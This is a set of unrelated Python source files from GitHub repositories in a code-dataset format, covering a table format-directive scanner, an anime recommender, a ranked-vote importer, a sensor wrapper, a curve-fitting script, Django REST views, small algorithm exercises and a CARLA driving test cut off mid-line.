Instance variables for user read access:\n\n    error_text\n        Describes what was wrong with option_format_spec.\n        Empty string indicates a good option_format_spec.\n\n    align\n        Value scanned from [align_spec]. It is one of _LEFT,\n        _CENTER, _RIGHT, or _NOT_SPECIFIED.\n\n    format_func\n        Function with the signature of a format function.\n        Reference to a format function associated with a\n        scanned option-name or a default value.\n\n    format_spec\n        format_spec part of format_str.\n\n    width\n        Specifies the maximum number of horizontal columns of the\n        formatted text.\n\n    fixed\n        When True, indicates the formatted text is exactly width columns.\n\n    wrap\n        When True, indicates the formatted text is text wrapped.\n\n    sep\n        Specifies separator string to be placed after the formatted\n        text.\n\n    none\n        Specifies the formatted text for None cell value.\n\n    zero\n        Specifies the string to replace numbers that format to\n        all digits of 0.\n\n    parentheses\n        When formatted text starts with '-', enclose in parentheses.\n    \"\"\"\n\n    def __init__(self, format_str: str, config: MonoTableConfig) -> None:\n        \"\"\"\n        Scan the string per delimiters, return results as instance vars.\n\n        format_str\n            String: [align_spec][directives][format_spec]\n            See formats description in MonoTable.__init__().\n\n        config\n            Instance of MonoTableConfig that contains copies of a subset\n            of MonoTable instance and class variables. See MonoTable\n            doc string for detailed descriptions.\n            align_spec_chars\n            sep\n            format_func\n            format_func_map\n            option_spec_delimiters\n        \"\"\"\n\n        # A design choice was made to keep all the format string\n        # and format option handling in a separate class. This was done\n        # to reduce the size of MonoTable class. The downside is that\n        # the functions in this class need several MonoTable class and\n        # instance variables. 
A copy of these variables are passed\n # here by parameter 'config' of type MonoTableConfig.\n # The design choice not taken was to move the\n # FormatScanner member functions into MonoTable.\n\n # renames to shorten long lines\n align_spec_chars = config.align_spec_chars\n\n # Since v2.1.0 formatting options are called format directives.\n # The option_spec_* variable names below refer to format\n # directives.\n\n option_spec_delimiters = config.option_spec_delimiters\n\n # Verify that the start delimiter of option_spec_delimiters cannot\n # be mis-interpreted as one of the align_spec_chars.\n # Do test here after instance is created to allow overriding the\n # class variables on an instance. For example:\n # mt = MonoTable()\n # mt.align_spec_chars = 'lcr'\n if align_spec_chars and option_spec_delimiters:\n t = option_spec_delimiters[0]\n assert t not in align_spec_chars, 'ambiguous'\n\n if option_spec_delimiters:\n d = option_spec_delimiters\n assert len(d) == 3, 'one for start, between, end'\n\n # start char and end char can be the same.\n # between char must be unique.\n assert d[0] != d[1], 'between char different than start char'\n assert d[1] != d[2], 'between char different than end char'\n\n # Combine hard coded format function options with user supplied\n # format functions. Note that a user name will hide a hard coded\n # name.\n self._format_functions = dict()\n self._format_functions.update(monotable.plugin.format_functions)\n if config.format_func_map is not None:\n self._format_functions.update(config.format_func_map)\n\n self.error_text = ''\n # if an arg is expected and there is no default value, set to None,\n self.width = None # type: Optional[int]\n self.fixed = False\n self.wrap = False\n self.lsep = None\n self.rsep = None\n self.sep = config.sep\n self.zero = None\n self.none = None\n self.parentheses = False\n self.format_func = config.format_func\n\n self.align, option_format_spec = monotable.alignment.split_up(\n format_str, align_spec_chars)\n if not option_spec_delimiters:\n # no delimiters disables option_spec scanning\n self.format_spec = option_format_spec # type: str\n return\n\n self._start, self._between, self._end = option_spec_delimiters\n option_spec, self.format_spec = (\n self._parse(option_format_spec))\n self._scan(option_spec)\n\n def _parse(self, option_format_spec: str) -> Tuple[str, str]:\n \"\"\"Split option_format_spec into option_spec and format_spec.\n\n option_format_spec\n [option_spec][format_spec]\n option_spec == (*) where * is 0 or more characters\n See directives description in MonoTable.__init__().\n\n Returns a tuple consisting of:\n The option_spec including the enclosing delimiters or empty string.\n The rest of the string after closing delimiter or entire string.\n Since v2.1.0 option_spec refers to format directives.\n \"\"\"\n\n startswith_match = self._start + '*' + self._end + '*'\n if fnmatch.fnmatchcase(option_format_spec, startswith_match):\n # look for self._end starting char after self._start\n option_spec_end = option_format_spec.find(self._end, 1)\n option_spec = option_format_spec[:option_spec_end + 1]\n format_spec = option_format_spec[option_spec_end + 1:]\n return option_spec, format_spec\n return '', option_format_spec\n\n def _scan(self, option_spec: str) -> None:\n \"\"\"Scan option_spec string for options and values.\n\n Updates instance variables align, error_text, format_func,\n format_spec, width, fixed, wrap, sep, zero, none, and parentheses\n per scan results.\n Since v2.1.0 option_spec refers to format 
directives.\n\n option_spec\n (*) where * is one or more option names separated by ;.\n See option_spec description in MonoTable.__init__().\n \"\"\"\n\n if not option_spec:\n return\n\n # assumes option_spec starts and ends with correct delimiters\n option_spec_copy_for_error_text = option_spec[:]\n option_spec = option_spec[1:-1] # drop start and end delimiters\n if not option_spec: # anything left to scan?\n return\n\n option_list = option_spec.split(self._between) # type: List[str]\n\n # scan for each option, process, and remove from option_list\n self._scan_int_arg('width', option_list)\n self._scan_no_arg('fixed', option_list)\n self._scan_no_arg('wrap', option_list)\n self._scan_str_arg('lsep', option_list)\n self._scan_str_arg('rsep', option_list)\n self._scan_str_arg('sep', option_list)\n self._scan_str_arg('none', option_list)\n self._scan_str_arg('zero', option_list)\n self._scan_no_arg('parentheses', option_list)\n\n self._scan_format_func(option_list)\n\n # silently ignore fixed or wrap options if no width=N option\n if self.width is None:\n self.wrap = False\n self.fixed = False\n\n # rsep is an alias for sep since version 2.1.0\n # unconditionally replace sep with rsep if rsep is specified.\n if self.rsep is not None:\n self.sep = self.rsep\n\n if len(option_list) > 0:\n # All the allowed option expressions have been removed from\n # option_list. So option_list contains only invalid values or\n # duplicates. Duplicates can be the same option or more than\n # one format function name. Show them in the error message.\n error_messages = ['In option_spec \"{}\"'.format(\n option_spec_copy_for_error_text)]\n for opt in option_list:\n message = (' unrecognized option \"{}\",'\n ' bad/duplicate name or bad \"=value\".').format(opt)\n error_messages.append(message)\n error_messages.extend(self._allowed_options())\n self.error_text = '\\n'.join(error_messages)\n\n def _scan_no_arg(self, option_name: str, option_list: List[str]) -> None:\n \"\"\"Scan option_list for option_name option, remove if found.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name == option_name:\n if arg is None:\n setattr(self, option_name, True)\n option_list.remove(option)\n break\n\n def _scan_int_arg(self, option_name: str, option_list: List[str]) -> None:\n \"\"\"Scan option_list for option_name option + int arg and remove.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name == option_name:\n value = self._scan_gt_value(arg)\n if value is not None:\n setattr(self, option_name, value)\n option_list.remove(option)\n break\n\n def _scan_str_arg(self, option_name: str, option_list: List[str]) -> None:\n \"\"\"Scan option_list for option_name option + string arg and remove.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name == option_name:\n # Keep rest after '='. 
OK if empty string after '='.\n if arg is not None:\n setattr(self, option_name, arg)\n option_list.remove(option)\n break\n\n def _scan_format_func(self, option_list: List[str]) -> None:\n \"\"\"Scan option_list for a format function, remove if found.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name is not None and name in self._format_functions:\n if arg is None:\n self.format_func = self._format_functions[name]\n option_list.remove(option)\n break\n\n @staticmethod\n def _option_and_arg(option: str) -> Tuple[Optional[str], Optional[str]]:\n \"\"\"Split up a format option to an option name and arg.\"\"\"\n split_option = option.split('=')\n if len(split_option) == 1:\n return split_option[0].strip(), None\n elif len(split_option) == 2:\n return split_option[0].strip(), split_option[1]\n else:\n return None, None\n\n @staticmethod\n def _scan_gt_value(text: Optional[str]) -> Optional[int]:\n \"\"\"\n Scan text for integer value N. Returns N if an int > 0, else None.\n\n text can be None. If so return None.\n \"\"\"\n if text is None:\n return None\n try:\n int_value = int(text)\n except ValueError:\n return None\n if int_value < 1:\n return None\n else:\n return int_value\n\n def _allowed_format_functions(self) -> List[str]:\n lines = []\n fmt = ' {} - {}.'\n for name in sorted(self._format_functions):\n lines.append(fmt.format(name, self._format_functions[name]))\n return lines\n\n def _allowed_options(self) -> List[str]:\n lines = ['Directives are enclosed by \"{}\" and \"{}\", '\n 'and are separated by \"{}\".'.format(\n self._start, self._end, self._between),\n 'For example: \"{}width=22{}sep= {}\"'.format(\n self._start, self._between, self._end),\n 'Case is significant. Whitespace is not significant except',\n 'after the \"=\" in \"sep =\". Allowed options are:',\n ' width=N - column width is at most N columns. 
N > 0.',\n ' fixed - column width is exactly width=N columns.',\n ' Use to qualify width=N option.',\n ' wrap - wrap/re-wrap to width=N.',\n ' Use to qualify width=N option.',\n ' lsep=ccc - characters after lsep= go to left of column.',\n ' rsep=ccc - characters after rsep= go to right of column.',\n ' none=ccc - None formats as the characters after none=.',\n ' zero=ccc - if all digits are zero replace with ccc.',\n ' parentheses if minus sign, enclose in parentheses.',\n ]\n lines.extend(self._allowed_format_functions())\n return lines\n","repo_name":"tmarktaylor/monotable","sub_path":"monotable/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":15247,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"16147277121","text":"import pickle\nimport numpy as np\nfrom scipy import sparse\nimport time\nimport pandas as pd\nfrom lightfm import LightFM\nimport flask\nimport urllib.request,json\n\ndef loadJSON(url): #Loading JSON from Jikan API to get profile information\n\n try:\n with urllib.request.urlopen(url) as url:\n output=json.loads(url.read().decode())\n\n return output\n except urllib.request.HTTPError as err:\n print(err.status)\n if err.status==429:\n output=loadJSON(url)\n return output\n else:\n flask.abort(err.status,'An error has occured :( Please contact me for troubleshooting')\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\ndef anime_names(nums,dict_anime):\n a_arr=[]\n for n in nums:\n a_arr.append(dict_anime[n])\n return a_arr\n\ndef recommendation_n(model,users,crosstab_mat,dict_anime):\n fav=[]\n rec=[]\n for u in users:\n fav.append(anime_names(crosstab_mat.tocsr()[u].indices[:],dict_anime)[:])\n scores = model.predict(u, np.arange(crosstab_mat.shape[1]))\n top_anime = np.argsort(-scores)\n rec.append(anime_names(top_anime,dict_anime)[:])\n return fav,rec\n\ndef make_prediction(username,model,crosstab_mat,dict_anime,dict_user):\n num=list(dict_user.keys())[list(dict_user.values()).index(username)]\n fav,rec=recommendation_n(model,[num],crosstab_mat,dict_anime)\n final=[]\n for n in range(len(rec[0][:])):\n if rec[0][n] not in fav[0]:\n final.append(rec[0][n])\n return(final,fav)\n\ndef json_gen(preds,val):\n json_x={}\n json_x[val]=[]\n info=load_obj(\"anime_info\")\n\n for i in range(len(preds)):\n url=\"https://myanimelist.net/anime/\"+str(preds[i][0])\n index=info[info['anime_id']==preds[i][0]].index.values.astype(int)[0]\n json_x[val].append({\n \"title\":info[\"title\"][index],\n \"image_url\":info[\"image_url\"][index],\n \"anime_url\":url\n })\n\n return json_x\n\ndef fun_profile(username):\n user_url = \"https://api.jikan.moe/v3/user/\" + username\n data_user = loadJSON(user_url)\n\n json_u={}\n json_u[\"profile\"]=[]\n json_u[\"profile\"].append({\"username\":data_user[\"username\"],\n \"profile_url\":data_user[\"url\"],\n \"image_url\":data_user[\"image_url\"],\n \"anime_stats\":data_user[\"anime_stats\"]})\n return json_u\n\n\ndef main(username):\n start = time.time()\n crosstab_mat = load_obj(\"crosstab\")\n dict_user = load_obj(\"dict_user\")\n if username not in dict_user.values():\n end = time.time()\n return 0,end-start,[],[],\"Error username not found or not included in the scaled down version of the data\"\n dict_anime = load_obj(\"dict_anime\")\n\n model = load_obj(\"model\")\n\n f,favs = make_prediction(username,model,crosstab_mat,dict_anime,dict_user)\n final_pred=json_gen(f[:20],\"recs\")\n print(favs)\n 
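recommendation_n above turns the LightFM scores from model.predict into a ranking by negating them and calling np.argsort, so the highest score comes first. The idiom in isolation (the scores here are made up):

import numpy as np

scores = np.array([0.1, 0.9, 0.4])  # predicted scores for items 0..2
top_items = np.argsort(-scores)     # indices sorted by descending score
print(top_items)                    # -> [1 2 0]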
favs=json_gen(favs[0][:10],\"favs\")\n profile_json=fun_profile(username)\n end = time.time()\n return (1,end-start,profile_json,final_pred,favs)\n","repo_name":"KKallidromitis/REST-API-for-TV-show-Recommendation","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8813981954","text":"import argparse\nimport json\nimport re\nfrom sys import stdout, stderr\nfrom typing import Dict\n\nfrom ranked_vote.format import write_ballots, write_ballots_fh\nfrom ranked_vote_import import FORMATS, NORMALIZERS\n\nTERMINAL_RESET = '\\033[0m'\nTERMINAL_BOLD = '\\033[1m'\nTERMINAL_GREEN = '\\033[92m'\n\nFORMAT_METADATA = TERMINAL_BOLD + TERMINAL_GREEN + ' {}: ' + TERMINAL_RESET + '{}'\n\n\ndef import_rcv_data(input_format, files, output, normalize=False, params: Dict = None):\n if input_format not in FORMATS:\n raise ValueError('Format {} not understood.'.format(input_format))\n\n ballots = reader = FORMATS[input_format](files, params)\n if normalize:\n normalizer = NORMALIZERS[input_format]()\n ballots = (normalizer.normalize(ballot) for ballot in reader)\n\n if output is None:\n print('Writing data to stdout and not writing metadata.', file=stderr)\n write_ballots_fh(stdout, ballots)\n meta_file = None\n else:\n write_ballots(output, ballots)\n meta_file = re.sub(r'\\.csv(\\.gz)?$', '', output) + '.json'\n\n metadata = reader.get_metadata()\n metadata['normalized'] = normalize\n\n if meta_file is not None:\n with open(meta_file, 'w') as meta_fh:\n json.dump(metadata, meta_fh, sort_keys=True, indent=2)\n\n print(TERMINAL_BOLD + TERMINAL_GREEN + 'Done Converting.' + TERMINAL_RESET, file=stderr)\n for mk, mv in metadata.items():\n if isinstance(mv, list):\n print(FORMAT_METADATA.format(mk, ''), file=stderr)\n for item in mv:\n print(' ' + str(item), file=stderr)\n else:\n print(FORMAT_METADATA.format(mk, mv), file=stderr)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_format')\n parser.add_argument('files', nargs='+')\n parser.add_argument('--normalize', action='store_true')\n parser.add_argument('--params', type=json.loads, default=dict())\n parser.add_argument('-o', '--output')\n\n import_rcv_data(**vars(parser.parse_args()))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ranked-vote/ranked-vote-import","sub_path":"ranked_vote_import/bin/import_rcv_data.py","file_name":"import_rcv_data.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27679689018","text":"from psistats.libsensors.lib.sensors import init\nfrom psistats.libsensors.lib.sensors import iter_detected_chips\nfrom psistats.libsensors.lib.sensors import cleanup\nfrom psistats.libsensors.lib.sensors import SENSORS_FEATURE_FAN\nfrom psistats.libsensors.lib.sensors import SENSORS_FEATURE_TEMP\nfrom psistats.libsensors.lib.sensors import SensorsError\n\n__all__ = ['Sensors', 'CantReadSensor']\n\nclass CantReadSensor(SensorsError):\n \"\"\"Thrown when a sensor can not be read\"\"\"\n def __init__(self, *args, **kwargs):\n SensorsError.__init__(self, *args, **kwargs)\n\n\nclass Sensors(object):\n \"\"\"Simple abstraction over libsensors\"\"\" \n def __init__(self):\n self.chips = {}\n self.initted = False\n\n def init(self):\n \"\"\"Initialize sensors\"\"\"\n init()\n self.initted = True\n\n def cleanup(self):\n \"\"\"Cleanup after using sensors\"\"\"\n 
cleanup()\n        self.initted = False\n    \n    def add_chip(self, chipName):\n        \"\"\"Add a chip\"\"\"\n        for chip in iter_detected_chips(chip_name=chipName):\n            self.chips[chipName] = {}\n\n            for feature in chip:\n                self.chips[chipName][feature.label] = feature\n\n    def _get_unit(self, feature):\n        if feature.type == SENSORS_FEATURE_FAN:\n            return 'rpm'\n        elif feature.type == SENSORS_FEATURE_TEMP:\n            return 'c'\n        else:\n            return None\n\n\n    def get_value(self, chipName, featureLabel):\n        \"\"\"Get a value of a specific feature from a chip\"\"\"\n        try:\n            if chipName in self.chips:\n                if featureLabel in self.chips[chipName]:\n                    feature = self.chips[chipName][featureLabel]\n                    \n                    return (feature.get_value(), self._get_unit(feature))\n        except SensorsError as e:\n            if str(e) == \"Can't read\":\n                raise CantReadSensor(featureLabel)\n","repo_name":"psistats/linux-client","sub_path":"psistats/libsensors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"73497714008","text":"import multiprocessing\r\nfrom scipy.optimize import least_squares\r\nimport matplotlib.pyplot as plt\r\nfrom Eq_balance import balance\r\nimport numpy as np\r\nimport time\r\nplt.rcParams[\"font.size\"] = 20\r\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\r\nplt.rcParams[\"figure.dpi\"] = 320\r\n\r\ndef main():\r\n    start_time = time.time()\r\n    file_list =[\r\n    './exp_data/res/2022-12-26/GL840_01_No3_2022-12-26_15-44-03.csv'\r\n    ]*4\r\n\r\n    #start_list = [17100,18000,18950,19600,20300,21300,22300,23100]\r\n    start_list = [18000,18950,19600,20300]\r\n    params = [62.69737115, 0.07982275, 0.41252353]\r\n\r\n    params = np.array([10, 0.07855777, 0.38171265])\r\n    params = fitting_param(params, file_list,start_list)\r\n    compare_all(params, file_list,start_list)\r\n    print(' computation time ',(time.time() - start_time)/3600,' hours')\r\n\r\n\r\n# curve fitting\r\ndef fitting_param(corr0, file_, time_):\r\n    bound = ([5, 0.003, 0.1],[100, 0.3,3])\r\n    xscales = [5,0.01, 0.02]\r\n    res_perf = least_squares(lsq_fit_multi,corr0, bounds=bound, verbose = 1,method='trf',x_scale=xscales,args=(file_,time_))\r\n    fitted_params = res_perf.x\r\n    print(fitted_params)\r\n    return fitted_params\r\n\r\n\r\n# give params and calc simulation results\r\ndef param_set(system, corr):\r\n    system.h_CO2 = corr[0]\r\n    system.K1_LDF = corr[1]\r\n    system.k_water = corr[2]\r\n\r\n    system.simulation_time = 120\r\n    system.set_dependant_var_IC()\r\n    return system\r\n\r\n\r\n# run lsq for many cases\r\ndef lsq_fit(corr,res_list, time_list):\r\n    diff_all = []\r\n    for i in range(len(res_list)):\r\n        diff_all.extend(diff_sim_exp(corr, res_list[i],time_list[i]))\r\n    return diff_all\r\n\r\n\r\n# run lsq for many cases with multi process calculation\r\ndef lsq_fit_multi(corr,res_list, time_list):\r\n    proc = []\r\n    proc_answer = []\r\n    # prepare the multi process\r\n    for i in range(len(res_list)):\r\n        get_rev,send_rev = multiprocessing.Pipe(False)\r\n        t = multiprocessing.Process(target=diff_sim_exp,args=(corr, res_list[i],time_list[i],send_rev))\r\n        proc_answer.append(get_rev)\r\n        t.start()\r\n        proc.append(t)\r\n    \r\n    # run the computations\r\n    for i in range(len(proc)):\r\n        proc[i].join()\r\n    \r\n    # collect the results\r\n    diff_all = []\r\n    for i in range(len(proc)):\r\n        diff_all.extend(proc_answer[i].recv())\r\n    return diff_all\r\n\r\n\r\n# calculate the difference between experiment and simulation with given params\r\ndef diff_sim_exp(corr,res_exp,start_sec,send_rev):\r\n    mof_type = 'Uio-66'\r\n    system = 
balance(mof_type,res_exp,start_sec)\r\n\r\n # set parameters and solve it\r\n system = param_set(system, corr)\r\n system.solver()\r\n\r\n # experimental data\r\n exp_temp_sor = system.res_exp.d_loc('sorbent')\r\n #exp_temp_gas = system.res_exp.d_loc(\"CO2 outlet\")\r\n exp_temp_water = system.res_exp.d_loc(\"water outlet\")\r\n \r\n # comparison of exp and sim\r\n dT_sor = []; dT_water = [];dT_gas = []\r\n for t in range(int(max(system.t))):\r\n sim_index = np.where(system.t.astype(int)==t)[0][0]\r\n exp_index = np.where(system.res_exp.time_line==t)[0][0]\r\n\r\n #dT_gas.append(relative_diff(system.gas_T_list[sim_index], exp_temp_gas.iloc[exp_index]))\r\n dT_sor.append(relative_diff(system.mof_T_list[sim_index], exp_temp_sor.iloc[exp_index]))\r\n dT_water.append(relative_diff(system.T_HTF_list[sim_index], exp_temp_water.iloc[exp_index]))\r\n\r\n # ratio of importanec of parameters\r\n #dT_gas = np.array(dT_gas) * 1.0\r\n #dT_sor = np.array(dT_sor) * 1.0\r\n dT_water = np.array(dT_water) * 1.0\r\n # return the difference \r\n #diff_sim = np.concatenate((dT_water, dT_sor), axis = 0)\r\n diff_sim = dT_water\r\n send_rev.send(diff_sim)\r\n return diff_sim\r\n\r\n\r\n\r\n# return relative difference\r\ndef relative_diff(data_sim, data_exp):\r\n data_sim = float(data_sim) # K\r\n data_exp = float(data_exp) + 273.15 # modify celcius to kelvin\r\n error = abs((data_sim - data_exp))\r\n return error\r\n\r\n\r\n# make a graph for each case\r\ndef compare_all(params, res_list,time_list):\r\n for i in range(len(res_list)):\r\n tot_Q_w = compare_temp(params, res_list[i],time_list[i],i+1)\r\n print('num : ',i+1,' ', tot_Q_w, ' J ')\r\n\r\n\r\n# compare the temperatures from simulation adn experiment\r\ndef compare_temp(params, file,start,num):\r\n mof_type = 'Uio-66'\r\n\r\n System = balance(mof_type,file,start)\r\n param_set(System, params)\r\n tot_Q = System.solver()\r\n\r\n fig = plt.figure(figsize=(8,5))\r\n ax_T = fig.add_subplot(1,1,1)\r\n\r\n # simulation plot\r\n sim_legends = ['water(sim)']\r\n sim_temp_data = [System.T_HTF_list-273.15]\r\n for i in range(len(sim_temp_data)):\r\n ax_T.plot(System.t, sim_temp_data[i], label = sim_legends[i],linewidth = 2)\r\n\r\n\r\n # experimental data\r\n exp_temp_sor = System.res_exp.d_loc('sorbent')\r\n #exp_temp_gas = System.res_exp.d_loc(\"CO2 outlet\")\r\n exp_temp_water = System.res_exp.d_loc(\"water outlet\")\r\n exp_legends = ['water(exp)']\r\n exp_temp_data = [exp_temp_water]\r\n markers = ['s']\r\n for i in range(len(exp_temp_data)):\r\n ax_T.scatter(System.res_exp.time_line, exp_temp_data[i], label = exp_legends[i], marker=markers[i], s=15, edgecolors='k')\r\n ax_T.set_xlabel(' t sec')\r\n ax_T.set_ylabel(' T ℃')\r\n ax_T.set_xlim(-1,System.t[-1])\r\n ax_T.legend()\r\n ax_T.grid(axis='both')\r\n fig.savefig('./Fig/temp_compare_'+str(start)+'.png')\r\n return tot_Q\r\n\r\n\r\nif __name__=='__main__':\r\n main()","repo_name":"Cinebou/HCA_HP_lumped","sub_path":"curve_fit_param.py","file_name":"curve_fit_param.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1256402835","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import JsonResponse,HttpResponse\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\n\nfrom tutorials.models import Tutorials\nfrom tutorials.serializers import TutorialsSerializer\nfrom rest_framework.decorators import 
api_view\n\n@api_view(['GET','POST','DELETE'])\ndef tutorials_list(request):\n    if request.method=='GET':\n        tutorials=Tutorials.objects.all() # 'object' no longer works and needs to be corrected to => objects\n        #'objects' stands for converting a model into a dictionary\n        title=request.query_params.get('title',None)\n        if title is not None:\n            tutorials=tutorials.filter(title=title)\n        tutorials_serializer=TutorialsSerializer(tutorials,many=True)\n        print(tutorials_serializer.data)\n        return JsonResponse(tutorials_serializer.data,safe=False,json_dumps_params={'ensure_ascii':False})\n    \n    elif request.method=='POST':\n        tutorial_data=JSONParser().parse(request)\n        tutorials_serializer=TutorialsSerializer(data=tutorial_data)\n        if tutorials_serializer.is_valid():\n            tutorials_serializer.save()\n            return JsonResponse(tutorials_serializer.data,status=status.HTTP_201_CREATED)\n        return JsonResponse(tutorials_serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n    \n    elif request.method=='DELETE':\n        count=Tutorials.objects.all().delete()\n        return JsonResponse({'message':'{} Tutorials were deleted successfully'.format(count[0])},status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef tutorial_detail(request, title):\n    print('#'*90)\n    print(type(title))\n    try: \n        tutorials = Tutorials.objects.get(title=title) \n    except Tutorials.DoesNotExist: \n        return JsonResponse({'message': 'The Tutorials does not exist'}, status=status.HTTP_404_NOT_FOUND) \n\n    if request.method == 'GET': \n        tutorial_serializer = TutorialsSerializer(tutorials) \n        return JsonResponse(tutorial_serializer.data) \n\n    elif request.method == 'PUT': \n        tutorial_data = JSONParser().parse(request) \n        tutorial_serializer = TutorialsSerializer(tutorials, data=tutorial_data) \n        if tutorial_serializer.is_valid(): \n            tutorial_serializer.save() \n            return JsonResponse(tutorial_serializer.data) \n        return JsonResponse(tutorial_serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n\n    elif request.method == 'DELETE': \n        tutorials.delete() \n        return JsonResponse({'message': 'Tutorials was deleted successfully!'}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\ndef tutorial_list_published(request):\n    tutorials = Tutorials.objects.filter(published=True)\n\n    if request.method == 'GET': \n        tutorials_serializer = TutorialsSerializer(tutorials, many=True)\n        return JsonResponse(tutorials_serializer.data, safe=False)","repo_name":"zheng013/restful_django_restframework_demo","sub_path":"tutorials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24402887039","text":"\ns = input(\"enter numbers:\\n\")\nn = list(map(int, s.split()))\n\ndef quick_sort(n):\n\tquick_sort2(n, 0, len(n)-1)\n\t\ndef quick_sort2(n, low, hi):\n\tif low < hi:\n\t\tp = partition(n, low, hi)\n\t\tquick_sort2(n, low, p - 1)\n\t\tquick_sort2(n, p + 1, hi)\n\t\ndef get_pivot(n, low, hi):\n\tmid = (hi + low) // 2\n\ts = sorted([n[low], n[mid], n[hi]])\n\tif s[1] == n[low]:\n\t\treturn low\n\telif s[1] == n[mid]:\n\t\treturn mid\n\treturn hi\n\t\ndef partition(n, low, hi):\n\tpivotIndex = get_pivot(n, low, hi)\n\tpivotValue = n[pivotIndex]\n\tn[pivotIndex], n[low] = n[low], n[pivotIndex]\n\tborder = low\n\n\tfor i in range(low, hi+1):\n\t\tif n[i] < pivotValue:\n\t\t\tborder += 1\n\t\t\tn[i], n[border] = n[border], n[i]\n\tn[low], n[border] = n[border], n[low]\n\n\treturn (border)\n\t\ndef quick_selection(x, first, last):\n\tfor i in range (first, last):\n\t\tminIndex = i\n\t\tfor j in range(i+1,last+1):\n\t\t\tif x[j] < x[minIndex]:\n\t\t\t\tminIndex = j\n\t\tif minIndex != i:\n\t\t\tx[i], x[minIndex] = x[minIndex], x[i]\n\t\t\t\n\nquick_sort(n)  # sort the list in place before printing\nprint (\"Sorted array:\")\nfor i in range(len(n)):\n    print (\"%d\" %n[i]) ","repo_name":"tejas2008/Pycodes","sub_path":"python codes/sorting codes/qsort.py","file_name":"qsort.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74941295127","text":"\nclass Solution:\n    def binaryGap(self, N: int) -> int:\n        index = [i for i, v in enumerate(bin(N)) if v == '1']\n        result = 0\n        length = len(index) -1\n        \n        for i, val in enumerate(index):\n            \n            if i != length:\n                diff = index[i + 1] - val \n                \n                if diff > result:\n                    result = diff\n\n\n        return result\n\n\n","repo_name":"jay51/wallbreakers","sub_path":"week1/binary_gap.py","file_name":"binary_gap.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34551046712","text":"import numpy as np\nimport cv2\nimport random\nimport tensorflow.compat.v1 as tf\nimport sys\nimport os\nimport glob\nimport time\nimport math\ntry:\n    sys.path.append(glob.glob('/home/user/carla/PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n        sys.version_info.major,\n        sys.version_info.minor,\n        'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n    pass\n\nimport carla\nfrom actor import Actor\nfrom shapely.geometry import Polygon\nfrom controller import PIDLongitudinalController, PIDLateralController\nfrom safetypotential import SafetyPotential\n\nclient = carla.Client('127.0.0.1', 2000)\nclient.set_timeout(10.0)\n\n\ntry:\n    world = client.get_world()\n\n    traffic_manager = client.get_trafficmanager(8000)\n    traffic_manager.set_global_distance_to_leading_vehicle(2.5)\n    traffic_manager.set_synchronous_mode(True)\n\n    settings = world.get_settings()\n    settings.synchronous_mode = True\n    settings.fixed_delta_seconds = 0.05\n    settings.no_rendering_mode = True\n    world.apply_settings(settings)\n\n    actor = Actor(world, client)\n    latcontroller = PIDLateralController(K_P = 1.95, K_I = 0.05, K_D = 0.2, dt=0.05)\n    loncontroller = PIDLongitudinalController(K_P = 1.0, K_I = 0.05, K_D = 0., dt=0.05)\n    sff = SafetyPotential(world, world.get_map())\n\n    tf.disable_eager_execution()\n    sess = tf.Session()\n    with sess.as_default():\n        for exp in [4]:\n            log_file = open(\"policy_test_log/sff_policy_\" + str(exp) + \".txt\", \"wt\")\n            log_file.write(\"Iteration\\tSurvive_Time\\tScore\\n\")\n            for iteration in range(25):\n                actor.reset()\n                sff.Assign_Player(actor.player)\n                sff.Assign_NPCS(actor.npc_vehicle_actors)\n                for a in actor.npc_vehicle_actors:\n                    traffic_manager.ignore_lights_percentage(a, 5.0 * exp)\n                    traffic_manager.ignore_vehicles_percentage(a, 0.5 * exp)\n                world.tick()\n                world.tick()\n                world.tick()\n                world.tick()\n                world.tick()\n                success = 0\n                accel, brake, steer = 1.0, 0.0, 0.0\n                for step in range(5000):\n                    ret = actor.step([accel, brake, steer])\n                    world.tick()\n                    if ret[\"collision\"]:\n                        break\n                    if ret[\"success_dest\"]:\n                        success += 1\n\n                    target_velocity = sff.get_target_velocity(actor.route)\n\n                    acceleration = loncontroller.run_step(target_velocity, ret[\"velocity\"]) \n                    if acceleration >= 0.0:\n                        accel = min(acceleration, 0.75)\n                        brake = 0.0\n                    else:\n                        accel = 0.0\n                        brake = min(abs(acceleration), 0.3)\n\n\n                    steer = 